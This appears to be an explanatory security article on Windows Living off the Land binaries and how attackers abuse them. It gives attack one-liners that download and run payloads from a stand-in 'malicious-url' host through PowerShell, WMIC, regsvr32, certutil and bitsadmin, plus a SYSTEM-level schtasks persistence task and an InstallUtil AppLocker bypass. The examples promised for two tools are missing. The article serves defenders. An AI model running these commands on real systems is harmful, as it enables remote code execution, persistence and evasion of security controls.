Living off the Land Binaries (LoLBins) are legitimate Windows system files, tools, and executables that can be used by attackers to perform malicious activities, bypass security controls, and avoid detection. The use of LoLBins allows adversaries to blend in with normal system activities, making it harder for security software and personnel to identify their presence.
LoLBins are attractive to attackers for several reasons:
Pre-installed: LoLBins are built-in components of the operating system, eliminating the need to introduce additional tools or executables that could potentially trigger security alerts.
Legitimate: Since LoLBins are legitimate tools, they are typically trusted by security software and whitelisted in application control policies.
Flexible: Many LoLBins have powerful scripting and automation capabilities, making them useful for a wide range of malicious activities, including downloading payloads, executing code, maintaining persistence, and privilege escalation.
LoLBins are often used in combination with fileless malware techniques, where the malicious code is executed directly in memory without being written to disk. This approach further reduces the chances of detection by traditional security software.
Some notable examples of Windows LoLBins include PowerShell, Regsvr32, Mshta, Certutil, Bitsadmin, Rundll32, WMIC, Cscript, Wscript, and Schtasks.
Top LoL binaries used by attackers
PowerShell: PowerShell is a powerful scripting language and automation framework. Attackers often use PowerShell scripts to download payloads, execute code, and maintain persistence. A simple example of using PowerShell for a malicious purpose is downloading and executing a remote script:
powershell -ExecutionPolicy Bypass -NoLogo -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-url/payload.ps1')"
Regsvr32: This command-line utility is used to register and unregister OLE controls. Attackers use Regsvr32 to execute malicious scripts remotely without writing to the disk:
regsvr32 /u /n /s /i:http://malicious-url/payload.sct scrobj.dll
Mshta: Mshta is a utility used to execute HTML applications (.hta files). Attackers leverage Mshta to execute malicious scripts, bypassing security measures:
Certutil: Certutil is a command-line utility for managing certificates. Attackers use Certutil to download and decode malicious payloads:
certutil -urlcache -split -f http://malicious-url/payload-encoded.txt payload.exe certutil -decode payload-encoded.txt payload.exe
Bitsadmin: Bitsadmin is a command-line tool for managing background file transfers. Attackers use it to download malicious payloads:
bitsadmin /transfer myDownloadJob /download /priority normal http://malicious-url/payload.exe C:\Windows\Temp\payload.exe ``
Rundll32: Rundll32 is a utility used to run DLL files. Attackers use it to execute malicious code within a DLL:
WMIC: Windows Management Instrumentation Command-line (WMIC) is a scripting interface for managing devices and applications. Attackers use WMIC to execute malicious scripts remotely:
wmic process call create "powershell -ExecutionPolicy Bypass -NoLogo -Command \"IEX (New-Object Net.WebClient).DownloadString('http://malicious-url/payload.ps1')\""
Cscript and Wscript: Cscript and Wscript are command-line and Windows-based script hosts for running scripts written in VBScript or JScript. Attackers use them to execute malicious scripts:
cscript //NoLogo //E:JScript C:\path\to\malicious.js
Schtasks: Schtasks is a command-line utility for managing scheduled tasks. Attackers use Schtasks to create tasks that execute malicious payloads at specific intervals or on system startup:
schtasks /create /tn "MaliciousTask" /tr "C:\path\to\payload.exe" /sc ONSTART /ru SYSTEM
AppLocker Bypass: AppLocker is a feature that restricts the execution of certain applications. Attackers exploit weaknesses in AppLocker's default rules to execute malicious scripts. For example, an attacker might use the InstallUtil utility, which is not blocked by AppLocker:
InstallUtil.exe /logfile= /LogToConsole=false /U C:\path\to\malicious.dll
For more information on LoLBins and related attack techniques, I suggest reading the following articles:
LOLBAS Project: The Living Off The Land Binaries and Scripts (and now also Libraries) project maintains an extensive list of LoLBins, their use cases, and potential security risks: https://github.com/LOLBAS-Project/LOLBAS
"Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking: This blog post by enigma0x3 explains how attackers can use eventvwr.exe, a Windows event viewer, to bypass User Account Control (UAC) restrictions: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Living off the Land: This whitepaper by Symantec provides a detailed overview of Living off the Land techniques, including the use of LoLBins: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
Fileless Malware: SANS Institute's InfoSec Reading Room provides an in-depth analysis of fileless malware techniques, including the use of LoLBins: https://www.sans.org/reading-room/whitepapers/malicious/fileless-malware-38055